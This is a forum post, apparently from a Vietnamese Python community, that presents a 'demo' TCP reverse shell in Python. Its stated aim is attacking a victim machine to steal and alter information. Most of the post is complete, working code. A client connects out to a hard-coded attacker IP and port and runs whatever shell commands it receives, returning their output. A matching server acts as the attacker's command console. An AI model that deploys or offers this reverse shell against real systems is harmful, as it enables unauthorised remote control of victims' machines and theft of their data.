Python for InfoSec: Demo TCP Reverse Shell


 • administrators

  Ví dụ này demo lại quá trình tấn công vào máy nạn nhân và thực hiện các câu lệnh như: ipconfig, dir ... nhằm mục đích đánh cắp và thay đổi thông tin.

  Client

  # Python For Security Pycon.vn
  # Email: khanhnn@pythonvietnam.info
  # Basic TCP Client
  import socket           # For Building TCP Connection
  import subprocess         # To start the shell in the system
  def connect():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    # start a socket object 's' 
    s.connect(('172.16.12.95', 8081))              # Here we define the Attacker IP and the listening port
   
    while True:                         # keep receiving commands from the Kali machine
      command = s.recv(1024)                 # read the first KB of the tcp socket
      
      if 'terminate' in command:         # if we got termiante order from the attacker, close the socket and break the loop
        s.close()
        break 
      
      else:                   # otherwise, we pass the received command to a shell process
        
        CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        s.send( CMD.stdout.read() ) # send back the result
        s.send( CMD.stderr.read() ) # send back the error -if any-, such as syntax error
  
  def main ():
    connect()
  main()
  

  Server

  # Python For Security Pycon.vn
  # Email: khanhnn@pythonvietnam.info
  # Simple TCP Server 
  import socket  # For Building TCP Connection
  
  def connect():
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # start a socket object 's'
    
    s.bind(("172.16.12.95", 8081))              # define the kali IP and the listening port
    
    s.listen(1)                       # define the backlog size, since we are expecting a single connection from a single
                                # target we will listen to one connection
    
    print '[+] Listening for incoming TCP connection on port 8080'
    
    conn, addr = s.accept()   # accept() function will retuen the connection object ID (conn) and will return the client(target) IP address and source
                  # port in a tuple format (IP,port)
    
    print '[+] We got a connection from: ', addr
  
  
    while True:
      
      command = raw_input("Shell> ")  # Get user input and store it in command variable
      
      if 'terminate' in command:    # If we got terminate command, inform the client and close the connect and break the loop
        conn.send('terminate')
        conn.close()
        break
  
      else:
        conn.send(command)  # Otherwise we will send the command to the target
        print conn.recv(1024) # and print the result that we got back
      
  def main ():
    connect()
  main()
  

Hãy đăng nhập để trả lời
 

Có vẻ như bạn đã mất kết nối tới Cộng đồng Python Việt Nam, vui lòng đợi một lúc để chúng tôi thử kết nối lại.